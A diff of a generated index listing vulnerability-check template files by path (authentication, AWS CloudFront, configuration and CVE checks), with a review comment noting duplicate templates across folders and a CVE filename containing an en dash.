 ./poc/auth/hue-default-credential.yaml
 ./poc/auth/hue-login-panel.yaml
 ./poc/auth/hybris-default-login.yaml
+./poc/auth/hyperv-enhanced-session-mode-enabled.yaml
 ./poc/auth/iam-db-auth.yaml
 ./poc/auth/iam-key-rotation-90days.yaml
 ./poc/auth/iam-password-policy.yaml
@@ -3806,12 +3813,14 @@
 ./poc/auth/limit-login-attempts-reloaded-bf2055665c7948e55efebc0ff947d42e.yaml
 ./poc/auth/limit-login-attempts-reloaded.yaml
 ./poc/auth/limit-login-attempts.yaml
+./poc/auth/limit-maximum-authentication-attempts.yaml
 ./poc/auth/linksys-wifi-login-8644.yaml
 ./poc/auth/linksys-wifi-login.yaml
 ./poc/auth/list-all-posts-by-authors-nested-categories-and-titles-b42b05f52515fe0313f046f50f84548f.yaml
 ./poc/auth/list-all-posts-by-authors-nested-categories-and-titles.yaml
 ./poc/auth/livezilla-login-panel-8649.yaml
 ./poc/auth/livezilla-login-panel.yaml
+./poc/auth/lm-ntlmv1-authentication-enabled.yaml
 ./poc/auth/login-and-logout-redirect-2e880a42c739bd0db4dee779aa6991dc.yaml
 ./poc/auth/login-and-logout-redirect.yaml
 ./poc/auth/login-as-customer-or-user-03ea6c59de756aa7b3e89fdd00bd1462.yaml
@@ -4002,6 +4011,7 @@
 ./poc/auth/mapbox-token.yaml
 ./poc/auth/mastodon-chaossocial.yaml
 ./poc/auth/matomo-login-portal.yaml
+./poc/auth/max-password-age-too-high.yaml
 ./poc/auth/meks-smart-author-widget-492e8c704a973b304ed3684194f95cff.yaml
 ./poc/auth/meks-smart-author-widget-d7cf08d050d4d9c295d6307e65c1ae52.yaml
 ./poc/auth/meks-smart-author-widget.yaml
@@ -4021,6 +4031,7 @@
 ./poc/auth/microsoft-exchange-login.yaml
 ./poc/auth/mikrotik-routeros-login-page.yaml
 ./poc/auth/milesightvpn-etc-passwd-fileread.yaml
+./poc/auth/minimum-password-age-zero.yaml
 ./poc/auth/minio-default-login(1).yaml
 ./poc/auth/minio-default-login-1.yaml
 ./poc/auth/minio-default-login-2.yaml
@@ -4277,6 +4288,7 @@
 ./poc/auth/nuget-api-key.yaml
 ./poc/auth/nuget-key.yaml
 ./poc/auth/null-auth-header-auth-bypass.yaml
+./poc/auth/null-session-allowed.yaml
 ./poc/auth/nutanix-web-console-login-9159.yaml
 ./poc/auth/nutanix-web-console-login.yaml
 ./poc/auth/nuuno-network-login-9160.yaml
@@ -4446,6 +4458,8 @@
 ./poc/auth/panos-default-login-9457.yaml
 ./poc/auth/panos-default-login.yaml
 ./poc/auth/papercut-missing-auth.yaml
+./poc/auth/password-complexity-disabled.yaml
+./poc/auth/password-history-size-low.yaml
 ./poc/auth/password-policy-not-set.yaml
 ./poc/auth/password-policy.yaml
 ./poc/auth/password-protect-page-63e80b207008e79b35561b6e37e9e086.yaml
@@ -4457,6 +4471,7 @@
 ./poc/auth/password-protected-woo-store-d46bc741249c3ca579d0cc8e1ede0263.yaml
 ./poc/auth/password-protected-woo-store.yaml
 ./poc/auth/password-protected.yaml
+./poc/auth/password-reset-lock-screen-enabled.yaml
 ./poc/auth/passwordless-login-bcabcbcc36aef853d2316088d557e166.yaml
 ./poc/auth/passwordless-login.yaml
 ./poc/auth/passwords-manager-c109913f2f0a98614e2ea241b16f6738.yaml
@@ -4540,6 +4555,7 @@
 ./poc/auth/pinpoint-unauth-9589.yaml
 ./poc/auth/pinpoint-unauth-9590.yaml
 ./poc/auth/pinpoint-unauth.yaml
+./poc/auth/plaintext-passwords-in-memory.yaml
 ./poc/auth/plainview-protect-passwords-64631f7e755eb94d7c99500d0510ac42.yaml
 ./poc/auth/plainview-protect-passwords-79caa4f8ea1fa3260f686401ac5493b5.yaml
 ./poc/auth/plainview-protect-passwords.yaml
@@ -4831,13 +4847,18 @@
 ./poc/auth/secnet-ac-default-login.yaml
 ./poc/auth/secnet-ac-default-password.yaml
 ./poc/auth/secnet-ac-default-password.yml
+./poc/auth/secret-manager-inuse.yaml
 ./poc/auth/secret-patterns-db.yaml
+./poc/auth/secret-rotation-enabled.yaml
+./poc/auth/secret-rotation-interval.yaml
 ./poc/auth/secret-token-rb.yaml
 ./poc/auth/secret.yaml
 ./poc/auth/secrets(1).yaml
 ./poc/auth/secrets-file.yaml
 ./poc/auth/secrets-in-files-more.yaml
 ./poc/auth/secrets-in-files.yaml
+./poc/auth/secrets-patterns-pii.yaml
+./poc/auth/secrets-patterns-rules.yaml
 ./poc/auth/secsslvpn-auth-bypass.yaml
 ./poc/auth/secure-ip-logins-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/auth/secure-ip-logins-ff9293ba28748efa2ab9a2fe77385468.yaml
@@ -5169,6 +5190,7 @@
 ./poc/auth/ssh-authorized-keys-2.yaml
 ./poc/auth/ssh-authorized-keys.yaml
 ./poc/auth/ssh-default-logins.yaml
+./poc/auth/ssh-key-auth-required.yaml
 ./poc/auth/ssh-password-auth.yaml
 ./poc/auth/ssh-weak-public-key.yaml
 ./poc/auth/ssh-weakkey-exchange-algo.yaml
@@ -5622,6 +5644,7 @@
 ./poc/auth/webtoffee-gdpr-cookie-consent-06912f51d2ec918f28076a7a3b043da3.yaml
 ./poc/auth/webtoffee-gdpr-cookie-consent-4716e5623abe0c03013093fe5dad8deb.yaml
 ./poc/auth/webtoffee-gdpr-cookie-consent.yaml
+./poc/auth/webui-login.yaml
 ./poc/auth/wechat-social-login-2479cb4475d9844014f0ac9a888921a0.yaml
 ./poc/auth/wechat-social-login-935a5afdfd89c0c9b17e0f4778ac20b8.yaml
 ./poc/auth/wechat-social-login.yaml
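Review bot: `./poc/auth/ssh-key-auth-required.yaml` and `./poc/auth/webui-login.yaml`, added in the last hunk here, are the same templates the diffstat also creates as `poc/ssh/ssh-key-auth-required.yaml` and `poc/web/webui-login.yaml` (23 and 25 lines each), so one check will now run twice per scan and be counted twice in this index; `./poc/auth/http-preprocessor.yaml` in the first poc.txt hunk has the same twin under `poc/http/`, and the diffstat shows further pairs under `poc/detect/` vs `poc/docker/`, `poc/sql/` vs `poc/sql_injection/` and `poc/sql/` vs `poc/cve/`. poc.txt looks like a generated listing, so the fix belongs in the template tree (one copy per template, or a symlink where both category paths are wanted) rather than in this file. The diffstat also creates `"poc/cve/CVE-2024\342\200\22324142.yaml"`, whose name carries an en dash (U+2013) where every other CVE file uses the ASCII hyphen; renaming it to `poc/cve/CVE-2024-24142.yaml` keeps the `CVE-YYYY-NNNN` naming and any glob or lookup keyed on it consistent.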
@@ -6316,7 +6339,17 @@
 ./poc/aws/clearfy-ec9e3086bbcfcc850fb5fbec286cfaef.yaml
 ./poc/aws/cloud-enum-aws-app.yaml
 ./poc/aws/cloud-enum-aws-s3-bucket.yaml
+./poc/aws/cloudfront-compress-object.yaml
+./poc/aws/cloudfront-custom-certificates.yaml
+./poc/aws/cloudfront-geo-restriction.yaml
+./poc/aws/cloudfront-insecure-protocol.yaml
+./poc/aws/cloudfront-integrated-waf.yaml
+./poc/aws/cloudfront-logging-disabled.yaml
 ./poc/aws/cloudfront-logging-not-enabled.yaml
+./poc/aws/cloudfront-origin-shield.yaml
+./poc/aws/cloudfront-security-policy.yaml
+./poc/aws/cloudfront-traffic-unencrypted.yaml
+./poc/aws/cloudfront-viewer-policy.yaml
 ./poc/aws/cloudtrail-s3-bucket-logging.yaml
 ./poc/aws/cm-download-manager-e3b297c6bec277185667d6c49219a581.yaml
 ./poc/aws/cnpj-receitaws.yaml
@@ -7589,6 +7622,7 @@
 ./poc/config/detect-drone-config-6973.yaml
 ./poc/config/detect-drone-config.yaml
 ./poc/config/development-config-file.yaml
+./poc/config/device-guard-not-configured.yaml
 ./poc/config/discuz-config-global.yaml
 ./poc/config/discuz-info-config_ucenter.yaml
 ./poc/config/dlink-config-dump.yaml
@@ -7744,6 +7778,7 @@
 ./poc/config/joomla-config-file.yaml
 ./poc/config/joomla-sensitive-config.yaml
 ./poc/config/jsconfig-json.yaml
+./poc/config/k8s-liveness-probe-not-configured.yaml
 ./poc/config/kafka-misconfig.yaml
 ./poc/config/karma-config-js.yaml
 ./poc/config/keycloak-openid-config-1.yaml
@@ -9495,6 +9530,7 @@
 ./poc/cve/CVE-2013-7482.yaml
 ./poc/cve/CVE-2013-7483-a508557471007a6155b8898d7a35231b.yaml
 ./poc/cve/CVE-2013-7483.yaml
+./poc/cve/CVE-2014-0160.yaml
 ./poc/cve/CVE-2014-0165-dacd68e72d419d2e7af988604017dd45.yaml
 ./poc/cve/CVE-2014-0165.yaml
 ./poc/cve/CVE-2014-0166-32db846280cddec9240e4d78df71ba91.yaml
@@ -11838,6 +11874,7 @@
 ./poc/cve/CVE-2016-7981.yaml
 ./poc/cve/CVE-2016-8527.yaml
 ./poc/cve/CVE-2016-8706.yaml
+./poc/cve/CVE-2016-8735.yaml
 ./poc/cve/CVE-2016-9263-27497d8965222c35f38108456e98b280.yaml
 ./poc/cve/CVE-2016-9263.yaml
 ./poc/cve/CVE-2017-0929 (copy 1).yaml
@@ -12593,6 +12630,7 @@
 ./poc/cve/CVE-2017-7391 2.yaml
 ./poc/cve/CVE-2017-7391.yaml
 ./poc/cve/CVE-2017-7504.yaml
+./poc/cve/CVE-2017-7525.yaml
 ./poc/cve/CVE-2017-7529 (copy 1).yaml
 ./poc/cve/CVE-2017-7529 (copy 2).yaml
 ./poc/cve/CVE-2017-7529.yaml
@@ -13472,6 +13510,7 @@
 ./poc/cve/CVE-2019-1000003.yaml
 ./poc/cve/CVE-2019-1000031-f656c9c371b934dab79fd66b3ba056e1.yaml
 ./poc/cve/CVE-2019-1000031.yaml
+./poc/cve/CVE-2019-1003000.yaml
 ./poc/cve/CVE-2019-10068.yaml
 ./poc/cve/CVE-2019-10092.yaml
 ./poc/cve/CVE-2019-10098.yaml
@@ -14747,6 +14786,7 @@
 ./poc/cve/CVE-2020-15568.yaml
 ./poc/cve/CVE-2020-15867.yaml
 ./poc/cve/CVE-2020-15895.yaml
+./poc/cve/CVE-2020-15906.yaml
 ./poc/cve/CVE-2020-15920 2.yaml
 ./poc/cve/CVE-2020-15920.yaml
 ./poc/cve/CVE-2020-16139.yaml
@@ -26214,6 +26254,7 @@
 ./poc/cve/CVE-2023-2719-c6d2b209c751b9afed030c487a1053cd.yaml
 ./poc/cve/CVE-2023-2719.yaml
 ./poc/cve/CVE-2023-27292.yaml
+./poc/cve/CVE-2023-27294.yaml
 ./poc/cve/CVE-2023-2732-1192c1008e256cc793053ef1534c110b.yaml
 ./poc/cve/CVE-2023-2732.yaml
 ./poc/cve/CVE-2023-2733-3e8539ba6be575414c880795d33a1311.yaml
@@ -27572,6 +27613,7 @@
 ./poc/cve/CVE-2023-33510.yaml
 ./poc/cve/CVE-2023-3352-e547bc065a9e8e423ec5687380a9d7b7.yaml
 ./poc/cve/CVE-2023-3352.yaml
+./poc/cve/CVE-2023-33533.yaml
 ./poc/cve/CVE-2023-3356-c179e9a218f6a000761e510d823604f0.yaml
 ./poc/cve/CVE-2023-3356.yaml
 ./poc/cve/CVE-2023-33568.yaml
@@ -27837,6 +27879,7 @@
 ./poc/cve/CVE-2023-34960.yaml
 ./poc/cve/CVE-2023-3499-9897b56ea22d520b31450d796e22df9e.yaml
 ./poc/cve/CVE-2023-3499.yaml
+./poc/cve/CVE-2023-34992.yaml
 ./poc/cve/CVE-2023-34993.yaml
 ./poc/cve/CVE-2023-3501-6cebf07395b821e8b68c36b299d5c073.yaml
 ./poc/cve/CVE-2023-3501.yaml
@@ -29116,6 +29159,7 @@
 ./poc/cve/CVE-2023-43374.yaml
 ./poc/cve/CVE-2023-43493-920de2979a038b00f4e4229f01d4cd36.yaml
 ./poc/cve/CVE-2023-43493.yaml
+./poc/cve/CVE-2023-43494.yaml
 ./poc/cve/CVE-2023-43610-eb331965639b809109667e1ad984ee35.yaml
 ./poc/cve/CVE-2023-43610.yaml
 ./poc/cve/CVE-2023-4372-28aa0f5bbbf164a61e41abe5322aa8e0.yaml
@@ -29739,6 +29783,7 @@
 ./poc/cve/CVE-2023-46211.yaml
 ./poc/cve/CVE-2023-46212-e0278105da7e504a738397a4f6b902e8.yaml
 ./poc/cve/CVE-2023-46212.yaml
+./poc/cve/CVE-2023-46214.yaml
 ./poc/cve/CVE-2023-4626-049c396772f6b6c012ec854e7c8950cd.yaml
 ./poc/cve/CVE-2023-4626.yaml
 ./poc/cve/CVE-2023-4627-1d8ce7eabd5704c22a11f62afb96f7bf.yaml
@@ -30966,6 +31011,7 @@
 ./poc/cve/CVE-2023-49778-9ad8823aac101e96019f9c9514ad6aaa.yaml
 ./poc/cve/CVE-2023-49778.yaml
 ./poc/cve/CVE-2023-49785.yaml
+./poc/cve/CVE-2023-49799.yaml
 ./poc/cve/CVE-2023-49812-77c423f132f313cb4ce0f37b2bc1e8e8.yaml
 ./poc/cve/CVE-2023-49812.yaml
 ./poc/cve/CVE-2023-49813-be0afb8d4ae505f4a57ae920c9c590a8.yaml
@@ -33549,10 +33595,12 @@
 ./poc/cve/CVE-2024-0984-71d91175d296ca328f8e62ec29060567.yaml
 ./poc/cve/CVE-2024-0984.yaml
 ./poc/cve/CVE-2024-0986.yaml
+./poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml
 ./poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml
 ./poc/cve/CVE-2024-10002.yaml
 ./poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml
 ./poc/cve/CVE-2024-10003.yaml
+./poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml
 ./poc/cve/CVE-2024-10011-eefe8c0c540af6a79376e37c4cbbfad9.yaml
 ./poc/cve/CVE-2024-10011.yaml
 ./poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml
@@ -33563,6 +33611,7 @@
 ./poc/cve/CVE-2024-10040.yaml
 ./poc/cve/CVE-2024-10045-b4e327038c9d97f0951cbe31ae85ae95.yaml
 ./poc/cve/CVE-2024-10045.yaml
+./poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml
 ./poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml
 ./poc/cve/CVE-2024-10049.yaml
 ./poc/cve/CVE-2024-10050-5934ca333400ff14e6c956e88c6fcdd7.yaml
@@ -33593,11 +33642,19 @@
 ./poc/cve/CVE-2024-10176.yaml
 ./poc/cve/CVE-2024-10180-cda9906f3b0afcef720a2edb145ba669.yaml
 ./poc/cve/CVE-2024-10180.yaml
+./poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml
+./poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml
+./poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml
 ./poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml
 ./poc/cve/CVE-2024-10189.yaml
 ./poc/cve/CVE-2024-1021.yaml
+./poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml
+./poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml
+./poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml
 ./poc/cve/CVE-2024-10250-381303a6df453508271ce4a14d6f5e15.yaml
 ./poc/cve/CVE-2024-10250.yaml
+./poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml
+./poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml
 ./poc/cve/CVE-2024-10341-f9f2b1daeef7d31a7252cb1ebc44b526.yaml
 ./poc/cve/CVE-2024-10341.yaml
 ./poc/cve/CVE-2024-10342-4c9fa17231c31987f79d558b7b883e9d.yaml
@@ -33606,6 +33663,7 @@
 ./poc/cve/CVE-2024-10343.yaml
 ./poc/cve/CVE-2024-10357-4f61676917f036bdaefc6591bc3b8254.yaml
 ./poc/cve/CVE-2024-10357.yaml
+./poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml
 ./poc/cve/CVE-2024-1037-b7f7f3d961a0c33ea429c4b0e05a6902.yaml
 ./poc/cve/CVE-2024-1037.yaml
 ./poc/cve/CVE-2024-10374-0f08cd74cdc8b699792d2afd2c3f92eb.yaml
@@ -33620,6 +33678,8 @@
 ./poc/cve/CVE-2024-1042.yaml
 ./poc/cve/CVE-2024-1043-aee5ea7086ed40618487df73181f660f.yaml
 ./poc/cve/CVE-2024-1043.yaml
+./poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml
+./poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml
 ./poc/cve/CVE-2024-1044-5720ea5d7eef8537b26bc9836c2599a3.yaml
 ./poc/cve/CVE-2024-1044.yaml
 ./poc/cve/CVE-2024-1046-bfec7425f9f443824c4a93511a98dbc5.yaml
@@ -34738,6 +34798,7 @@
 ./poc/cve/CVE-2024-2143.yaml
 ./poc/cve/CVE-2024-2144-23500ffb45bc67090c3825cea30b2db5.yaml
 ./poc/cve/CVE-2024-2144.yaml
+./poc/cve/CVE-2024-21520.yaml
 ./poc/cve/CVE-2024-2159-f92ee339e92c436f54a3a32d187db5ba.yaml
 ./poc/cve/CVE-2024-2159.yaml
 ./poc/cve/CVE-2024-2163-4c370188065655705ee7ef45c88385e0.yaml
@@ -34805,6 +34866,7 @@
 ./poc/cve/CVE-2024-2203.yaml
 ./poc/cve/CVE-2024-2210-63c25c0622f9f4baebf3c98786c78ec1.yaml
 ./poc/cve/CVE-2024-2210.yaml
+./poc/cve/CVE-2024-22120.yaml
 ./poc/cve/CVE-2024-22134-0acb90c8af594860c66b93b71ce65fe0.yaml
 ./poc/cve/CVE-2024-22134.yaml
 ./poc/cve/CVE-2024-22135-aa0536d89ba0db70524ad0dec0d6fe8c.yaml
@@ -35020,6 +35082,7 @@
 ./poc/cve/CVE-2024-2309.yaml
 ./poc/cve/CVE-2024-2310-f1a051387d326ffbf4a8bb2e1cf980c8.yaml
 ./poc/cve/CVE-2024-2310.yaml
+./poc/cve/CVE-2024-23108.yaml
 ./poc/cve/CVE-2024-2311-8a2efd05b62f87d9bf191435ccdadf6e.yaml
 ./poc/cve/CVE-2024-2311.yaml
 ./poc/cve/CVE-2024-23163.yaml
@@ -35605,6 +35668,7 @@
 ./poc/cve/CVE-2024-2697.yaml
 ./poc/cve/CVE-2024-2702-b7e962ff6e19e83f5be875df87658aad.yaml
 ./poc/cve/CVE-2024-2702.yaml
+./poc/cve/CVE-2024-27130.yaml
 ./poc/cve/CVE-2024-27188-3e80b51dbae0f0fd95da022c1fdc71f5.yaml
 ./poc/cve/CVE-2024-27188.yaml
 ./poc/cve/CVE-2024-27189-3844f0df4850abbe5c839cb4b3d1040a.yaml
@@ -35986,6 +36050,7 @@
 ./poc/cve/CVE-2024-2926-892849f844a467f063df1469e5698973.yaml
 ./poc/cve/CVE-2024-2926.yaml
 ./poc/cve/CVE-2024-29269.yaml
+./poc/cve/CVE-2024-2928.yaml
 ./poc/cve/CVE-2024-2931-a31fc7075076c46049041132f7d5d46b.yaml
 ./poc/cve/CVE-2024-2931.yaml
 ./poc/cve/CVE-2024-2933-fbe9282a58927d219d35b2a53a6d63ec.yaml
@@ -37816,6 +37881,7 @@
 ./poc/cve/CVE-2024-3285.yaml
 ./poc/cve/CVE-2024-3287-c2144da6501714797b373f946b96b12c.yaml
 ./poc/cve/CVE-2024-3287.yaml
+./poc/cve/CVE-2024-32877.yaml
 ./poc/cve/CVE-2024-3288-9ec9083e38db99ab2459930f55e51dbf.yaml
 ./poc/cve/CVE-2024-3288.yaml
 ./poc/cve/CVE-2024-3293-efd5845dfba55ed7ef2574fca4ab1fae.yaml
@@ -39837,6 +39903,7 @@
 ./poc/cve/CVE-2024-3849-b86fbef037590625861860408256662a.yaml
 ./poc/cve/CVE-2024-3849.yaml
 ./poc/cve/CVE-2024-38526.yaml
+./poc/cve/CVE-2024-38653.yaml
 ./poc/cve/CVE-2024-3866-e32bf1790a0b5f93eed203718c8de990.yaml
 ./poc/cve/CVE-2024-3866.yaml
 ./poc/cve/CVE-2024-38669-b4988e1b98a7059d494d71f1c179f27a.yaml
@@ -40479,6 +40546,7 @@
 ./poc/cve/CVE-2024-4144.yaml
 ./poc/cve/CVE-2024-4145-ac8aebc5910c825cd0d214f834ad16af.yaml
 ./poc/cve/CVE-2024-4145.yaml
+./poc/cve/CVE-2024-41468.yaml
 ./poc/cve/CVE-2024-4149-ff377d3eb5955cb9dcb922a0b0fa7658.yaml
 ./poc/cve/CVE-2024-4149.yaml
 ./poc/cve/CVE-2024-4150-a9e4da102d6fbbdeb4d95a9a6fab344e.yaml
@@ -40553,6 +40621,7 @@
 ./poc/cve/CVE-2024-4261.yaml
 ./poc/cve/CVE-2024-4262-35ce47cb98788e7bedffde4793c9deae.yaml
 ./poc/cve/CVE-2024-4262.yaml
+./poc/cve/CVE-2024-42640.yaml
 ./poc/cve/CVE-2024-4265-653f92e9a55f8b2a4a38c4fb5a73a93a.yaml
 ./poc/cve/CVE-2024-4265.yaml
 ./poc/cve/CVE-2024-4266-db7dff2b364b7e2268ddf30699e03480.yaml
@@ -40707,6 +40776,7 @@
 ./poc/cve/CVE-2024-4319-34769eeaef5d684df8029c20a81cb8f8.yaml
 ./poc/cve/CVE-2024-4319-c5a4e1b355a0a92313a0c79292c263f8.yaml
 ./poc/cve/CVE-2024-4319.yaml
+./poc/cve/CVE-2024-4320.yaml
 ./poc/cve/CVE-2024-43207-79ab794490ce05c7a0a2b8eea3009a07.yaml
 ./poc/cve/CVE-2024-43207.yaml
 ./poc/cve/CVE-2024-43208-9a0145ee5d9d9695e7c9d06cea33925d.yaml
@@ -41394,6 +41464,7 @@
 ./poc/cve/CVE-2024-44045.yaml
 ./poc/cve/CVE-2024-44046-328792fa07f634dddb2bbb641f64fff7.yaml
 ./poc/cve/CVE-2024-44046.yaml
+./poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml
 ./poc/cve/CVE-2024-44047-ddedb021668141a7944db5384dc3c3d1.yaml
 ./poc/cve/CVE-2024-44047.yaml
 ./poc/cve/CVE-2024-44048-82a2490270a7c5a6192cdf887ad2c8fb.yaml
@@ -41555,6 +41626,7 @@
 ./poc/cve/CVE-2024-45293.yaml
 ./poc/cve/CVE-2024-4530-9a40def000de87d4be3ea01c097a6a90.yaml
 ./poc/cve/CVE-2024-4530.yaml
+./poc/cve/CVE-2024-45309.yaml
 ./poc/cve/CVE-2024-4531-99317c4a9b9d092195921ece3a2310ea.yaml
 ./poc/cve/CVE-2024-4531.yaml
 ./poc/cve/CVE-2024-4532-babdc5829ad7d6c3dddb2e098b147720.yaml
@@ -42104,6 +42176,7 @@
 ./poc/cve/CVE-2024-4836.yaml
 ./poc/cve/CVE-2024-4838-438709c75b9635eea017b97243965ed2.yaml
 ./poc/cve/CVE-2024-4838.yaml
+./poc/cve/CVE-2024-4841.yaml
 ./poc/cve/CVE-2024-4845-2662a05740af1e44cbe70ff5fcf32342.yaml
 ./poc/cve/CVE-2024-4845.yaml
 ./poc/cve/CVE-2024-4847-2e47b9f9d6dcb1afa3ee1ae23a82fc46.yaml
@@ -42716,6 +42789,7 @@
 ./poc/cve/CVE-2024-5331.yaml
 ./poc/cve/CVE-2024-5332-dff81043d580763d7a82f64d3036696f.yaml
 ./poc/cve/CVE-2024-5332.yaml
+./poc/cve/CVE-2024-5334.yaml
 ./poc/cve/CVE-2024-5335-f0e30cc08b0a4a188e47c1c50b01d31d.yaml
 ./poc/cve/CVE-2024-5335.yaml
 ./poc/cve/CVE-2024-5341-968a2fd7f4ceccb41ecca593b7cab646.yaml
@@ -43181,6 +43255,7 @@
 ./poc/cve/CVE-2024-6028.yaml
 ./poc/cve/CVE-2024-6033-9197717be97915089a2b9b5c78c3673f.yaml
 ./poc/cve/CVE-2024-6033.yaml
+./poc/cve/CVE-2024-6049.yaml
 ./poc/cve/CVE-2024-6054-5423963993c6e57bd26bb8f5ebae154a.yaml
 ./poc/cve/CVE-2024-6054.yaml
 ./poc/cve/CVE-2024-6069-504e0c7069132aec59344e8b80a745b3.yaml
@@ -44122,6 +44197,7 @@
 ./poc/cve/CVE-2024-7955.yaml
 ./poc/cve/CVE-2024-7963-42883078e2295a44c19c2974ad634068.yaml
 ./poc/cve/CVE-2024-7963.yaml
+./poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml
 ./poc/cve/CVE-2024-8016-d1bc0d8335eb95e44886878c9717595b.yaml
 ./poc/cve/CVE-2024-8016.yaml
 ./poc/cve/CVE-2024-8030-4bf23408e0dc80a213e018f362e5999c.yaml
@@ -44695,6 +44771,7 @@
 ./poc/cve/CVE-2024-9161-7df3ec5d46908dca2a1515693ac69f54.yaml
 ./poc/cve/CVE-2024-9161.yaml
 ./poc/cve/CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f.yaml
+./poc/cve/CVE-2024-9162.yaml
 ./poc/cve/CVE-2024-9169-f28b64870e010b6c9a9192d27b27621e.yaml
 ./poc/cve/CVE-2024-9169.yaml
 ./poc/cve/CVE-2024-9172-dd6c762e4dc7b5869543b2ed92be27e1.yaml
@@ -44769,6 +44846,7 @@
 ./poc/cve/CVE-2024-9242.yaml
 ./poc/cve/CVE-2024-9263-9f819c527e666a0f4e5ffb74898c3f93.yaml
 ./poc/cve/CVE-2024-9263.yaml
+./poc/cve/CVE-2024-9264.yaml
 ./poc/cve/CVE-2024-9265-6f041754ba39de1f44500ace37c6936a.yaml
 ./poc/cve/CVE-2024-9265.yaml
 ./poc/cve/CVE-2024-9267-8893aa1c1ec1b76901d7871f6ed6bfe5.yaml
@@ -44830,6 +44908,7 @@
 ./poc/cve/CVE-2024-9374.yaml
 ./poc/cve/CVE-2024-9375-1ada64725f832858cb5e8e8b357262ef.yaml
 ./poc/cve/CVE-2024-9375.yaml
+./poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml
 ./poc/cve/CVE-2024-9377-eb9f54f5139e537cd6a9ac4820541be4.yaml
 ./poc/cve/CVE-2024-9377.yaml
 ./poc/cve/CVE-2024-9378-8974a5e92d4cff0ea3c01120fb204b47.yaml
@@ -44853,6 +44932,7 @@
 ./poc/cve/CVE-2024-9435.yaml
 ./poc/cve/CVE-2024-9436-72a457058cb05b316cebd946dd84ec21.yaml
 ./poc/cve/CVE-2024-9436.yaml
+./poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml
 ./poc/cve/CVE-2024-9444-a6b3efa350afce890b47530869028068.yaml
 ./poc/cve/CVE-2024-9444.yaml
 ./poc/cve/CVE-2024-9445-0fedc25f3077e00a018f5c725f6ded08.yaml
@@ -44880,6 +44960,7 @@
 ./poc/cve/CVE-2024-9488.yaml
 ./poc/cve/CVE-2024-9501-75b9d56a40fe1396bb3b9ef1c7d11ff3.yaml
 ./poc/cve/CVE-2024-9501.yaml
+./poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml
 ./poc/cve/CVE-2024-9507-698602582a898ef6e8ecf4cbadd940fc.yaml
 ./poc/cve/CVE-2024-9507.yaml
 ./poc/cve/CVE-2024-9518-feda24c489ca1e9c4a2da83d340cc3c2.yaml
@@ -44968,6 +45049,7 @@
 ./poc/cve/CVE-2024-9627.yaml
 ./poc/cve/CVE-2024-9628-3d855d9a00666119c6c4dc4121ccafb1.yaml
 ./poc/cve/CVE-2024-9628.yaml
+./poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml
 ./poc/cve/CVE-2024-9630-0ce85caa78ba4624e2a8716c2971cba8.yaml
 ./poc/cve/CVE-2024-9630.yaml
 ./poc/cve/CVE-2024-9634-d865b6fc0ac9d8d7dca8d3f6df89b5a1.yaml
@@ -45073,6 +45155,7 @@
 ./poc/cve/CVE-2024-9931.yaml
 ./poc/cve/CVE-2024-9932-7558b83919bdb2cc193ccec87ae1cb78.yaml
 ./poc/cve/CVE-2024-9932.yaml
+./poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml
 ./poc/cve/CVE-2024-9933-e1ec60c544c2e28af5a94072e33b5a84.yaml
 ./poc/cve/CVE-2024-9933.yaml
 ./poc/cve/CVE-2024-9937-9915217ba7d6f29cd232016898fb9998.yaml
@@ -45089,6 +45172,7 @@
 ./poc/cve/CVE-2024-9951.yaml
 ./poc/cve/CVE-2024-9967-588327a449d255859025a57006363402.yaml
 ./poc/cve/CVE-2024-9967.yaml
+./poc/cve/CVE-2024–24142.yaml
 ./poc/cve/CVE202127562-220331-222408.yaml
 ./poc/cve/CVE_2023_49442.yaml
 ./poc/cve/CVE_2023_51467.yaml
@@ -52478,6 +52562,7 @@
 ./poc/cve/cve-2024-23334.yaml
 ./poc/cve/cve-2024-23897.yaml
 ./poc/cve/cve-2024-3400.yaml
+./poc/cve/cve-2024-6966.yaml
 ./poc/cve/cve-annotate.yaml
 ./poc/cve/cve-annotate.yml
 ./poc/cve/cve202120837-220331-223044.yaml
@@ -53167,6 +53252,7 @@
 ./poc/default/caprover-default-login.yaml
 ./poc/default/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml
 ./poc/default/change-default-login-logo-url-and-title.yaml
+./poc/default/change-default-port.yaml
 ./poc/default/chinaunicom-default-login-906.yaml
 ./poc/default/chinaunicom-default-login-907.yaml
 ./poc/default/chinaunicom-default-login-908.yaml
